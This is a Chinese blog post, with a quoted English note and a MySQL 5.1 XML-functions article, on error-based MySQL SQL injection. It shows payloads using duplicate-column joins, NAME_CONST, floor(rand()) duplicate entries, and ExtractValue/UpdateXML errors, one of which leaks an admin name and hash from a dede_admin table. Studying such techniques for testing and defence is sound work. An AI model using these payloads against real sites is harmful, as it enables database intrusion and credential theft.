taoCMS是基于php+sqlite/mysql的国内最小(100Kb左右)的功能完善的CMS管理系统

MySQL注入中报错的利用

2010-06-12

在很多的情况 下我们不能直接方便的进行注入,于是有了BENCHMARK延迟注射,如果能得到MySQL的错误信息的话,现在又有了更方便的方法。
网上流传了两三种方法,以前我在BLOG也记录了其中一种。
===========================================

MySQL注入中新Tips

//利用MySQL出错爆出字段
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B) C;
ERROR 1060 (42S21): Duplicate column name 'Host'
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host)) C;
ERROR 1060 (42S21): Duplicate column name 'User'
mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host,User)) C;
ERROR 1060 (42S21): Duplicate column name 'Password'
.....
//得到信息
//可能是版本问题,我测试没能成功
mysql> SELECT NAME_CONST((SELECT Host FROM user LIMIT 0,1),0);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST
好像是NAME_CONST的参数必须为CONST还是怎么了,悲剧。
下次再好好测试一下。


Update:确实是版本的问题(高版本要求参数全为const,否则报错),这方法的通用性看来不是很好。
mysql> SELECT version();
+---------------------+
| version()           |
+---------------------+
| 5.0.27-community-nt |
+---------------------+
1 row in set (0.00 sec)

mysql> SELECT NAME_CONST((SELECT user()),0);
+----------------+
| root@localhost |
+----------------+
|              0 |
+----------------+
1 row in set (0.00 sec)

-------------------------------------
mysql> SELECT version();
+------------------+
| version()        |
+------------------+
| 5.1.35-community |
+------------------+
1 row in set (0.00 sec)

mysql> SELECT NAME_CONST((SELECT version()),0);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST

==============================================

前段时间在t00ls上看到的另一种:
http://www.t00ls.net/thread-8745-1-4.html
类似这样
mysql> SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT 'x'))a fro
m information_schema.tables group by a)b;
ERROR 1062 (23000): Duplicate entry '1x' for key 'group_key'
这种方法对MySQL版本没什么要求,但只能爆出64字节的数据,用这种方法遇到大数据只能MID慢慢来了。
最后一种(只针对MySQL 5.1++)
==========================================================

mysql exploitation with error messages
2010-07-07 10:30

a russian presentation on exploiting SQL Injection:

http://devteev.blogspot.com/2009/10/advanced-sql-injection-lab-full-pack.html

Of all the slides, i particular liked the one in which the author demonstrates that if the mysql error messages have been enabled (using mysql_error() function), then it is possible to retrieve the data from the back-end database using the ExtractValue() function:
——————————————
>SELECT 1 AND ExtractValue(1, CONCAT(0×5c, (SELECT @@VERSION)))

produces:

Error Code : 1105
XPATH syntax error: ‘ .1.44-community’

———————-
This should not be confused with the php errors. While the php errors are usually enabled its not “very” common to see developers printing the mysql errors using mysql_error() function. However, its still good to know and could sometimes come handy.

Overall, very nice presentation.

====================================================

通过对ExtractValue函数传递不合XPATH语法规则的参数来爆出数据。
ExtractValue、UpdateXML函数参见:http://dev.mysql.com/tech-resources/articles/mysql-5.1-xml.html
===========================================

MySQL 5.1's New XML Functions

MySQL version 5.1.5 has functions for searching and changing XML documents. This article has examples.

Let's make a database and put two XML documents in it.

CREATE TABLE x (doc VARCHAR(150));
INSERT INTO x VALUES
('
<book>
<title>A guide to the SQL standard</title>
<author>
<initial>CJ</initial>
<surname>Date</surname>
</author>
</book>
');
INSERT INTO x VALUES
('
<book>
<title>SQL:1999</title>
<author>
<initial>J</initial>
<surname>Melton</surname>
</author>
</book>
');

The doc columns have an internal hierarchical structure, with books containing titles and authors, and authors in turn containing initials and surnames. It's a popular way to format and store, and the "markup" -- words like "<book>" and </book>" -- makes it easy to see the hierarchy if you're careful about indentation.

ExtractValue()

Syntax
EXTRACTVALUE (XML_document, XPath_string);
1st Parameter
XML_document string formatted as in the example
2nd Parameter
XPath_string (XPath is a "sub-language")
Action
returns string containing a value from the document
Example #E1
mysql> SELECT EXTRACTVALUE(doc,'/book/author/initial') FROM x;
+------------------------------------------+
| EXTRACTVALUE(doc,'/book/author/initial') |
+------------------------------------------+
| CJ |
| J |
+------------------------------------------+
2 rows in set (0.01 sec)

What happened here? Books contain authors which contain initials. With EXTRACTVALUE() we navigated down through the hierarchy to get the values at the final node points: 'CJ' and 'J'. A basic extraction is just a matter of specifying the hierarchy in the XPath_string argument.

Example #E2
mysql> SELECT EXTRACTVALUE(doc,'/*/*/initial') FROM x;
+----------------------------------+
| EXTRACTVALUE(doc,'/*/*/initial') |
+----------------------------------+
| CJ |
| J |
+----------------------------------+
2 rows in set (0.01 sec)

You don't have to list the whole hierarchy. When part of a path is a wildcard, that means "any name will do".

Example #E3
mysql> SELECT extractValue(doc,'/book/child::*') FROM x;
+---------------------------------------------+
| extractValue(doc,'/book/child::*') |
+---------------------------------------------+
| A guide to the SQL standard |
| SQL:1999 |
+---------------------------------------------+
2 rows in set (0.00 sec)

With /book/child:: we find what's immediately below book, namely the title data. We could use a variety of operators here:
child ... what's immediately below
descendant ... what's below at all levels
parent ... what's immediately above
ancestor ... what's above at all levels
following-sibling ... what's next at same level
preceding-sibling ... what's before at same level
self ... not before, not after, same level

Example #E4
mysql> select
extractValue(doc,'/book/author/surname[self:text()="Date"]') from x;
+--------------------------------------------------------------+
| extractValue(doc,'/book/author/surname[self:text()="Date"]') |
+--------------------------------------------------------------+
| Date |
| |
+--------------------------------------------------------------+
2 rows in set (0.00 sec)

And here's one way to add a predicate (a conditional expression). By saying "in the text of self, that is, in the text of surname because the predicate immediately comes after surname, look for value = Date", we include book/author/surname=Date and we exclude book/author/surname=Melton. The Melton row is blank. Naturally = isn't the only operator we could use here; we could have self:text()>="Date", self:text()="Date" OR self:text()="Melton", and so on.

What you've seen is: an XPath expression can contain nodes separated by slashes (vaguely like a Unix path expression), and you can pick values from one or more nodes. Wildcards, navigation aids, and predicates are supported. Although the examples all used extractValue() in the SELECT list, it can be used in any statement wherever an expression is allowed. A good tip is to combine XML columns with fulltext indexing.

UpdateXML()

Now here's a new function for updating the structure.

Syntax
UPDATEXML (XML_document, XPath_string, new_value);
1st Parameter
XML_document string formatted as in the example
2nd Parameter
XPath_string (XPath is a "sub-language")
3rd Parameter
new_value to replace whatever is found
Action
changes string containing a value from the document
Example #U1
mysql> select UpdateXML(doc,'/book/author/initial','!!') from x;
+----------------------------------------------------------+
| UpdateXML(doc,'/book/author/initial','!!') |
+----------------------------------------------------------+
|
<book>
<title>A guide to the SQL standard</title>
<author>
!!
<surname>Date</surname>
</author>
</book> |
|
<book>
<title>SQL:1999</title>
<author>
!!
<surname>Melton</surname>
</author>
</book> |
+----------------------------------------------------------+
2 rows in set (0.00 sec)

UpdateXML's first two arguments are the same as for ExtractValue because the first thing we want to do is navigate to the node. The third argument is a replacement string. So we change book/author/initial to !!. The return value is the complete new document. To replace the document permanently, you could say UPDATE x SET doc = UpdateXML(doc,'/book/author/initial','!!');

But this is probably a mistake! We didn't just change the text to !!. We changed <initial>CJ></initial> to !! So we changed the document structure. Normally, we only want to change the contents. For that, we should say: select UpdateXML(doc,'/book/author/initial','<initial>!!</initial>') from x;

Example #U2
mysql> select
extractvalue(
UpdateXML(doc,'/book/author/initial','<initial>!!</initial>'),'/book/author/
initial') from x;
+---------------------------------------------------------------------------
--------------------------+
|
extractvalue(
UpdateXML(doc,'/book/author/initial','<initial>!!</initial>'),'/book/author/
initial') |
+---------------------------------------------------------------------------
--------------------------+
| !!
|
| !!
|
+---------------------------------------------------------------------------
--------------------------+
2 rows in set (0.01 sec)

This final example, a combination of ExtractValue() and UpdateXML(), shows what would happen if we change the initial node to !! and then select the initial node. Naturally, we get !!.

============================================

利用方法:
mysql> SELECT 1 FROM dede_admin WHERE updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a
,MID(pwd,4,16),0x5d) FROM dede_admin),1);
ERROR 1105 (HY000): XPATH syntax error: '[admin:7a57a5a743894a0e]'
比上一种方法方便简洁,不过这方法只能爆出32字节的数据。同样,大数据只能Mid了。
实际测试效果:

类别:技术文章 | 阅读:335513 | 评论:1 | 标签:

想收藏或者和大家分享这篇好文章→

“MySQL注入中报错的利用”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

taoCMS发布taoCMS 3.0.2(最后更新21年03月15日),请大家速速升级,欢迎大家试用和提出您宝贵的意见建议。

捐助与联系

☟请使用新浪微博联系我☟

☟在github上follow我☟

标签云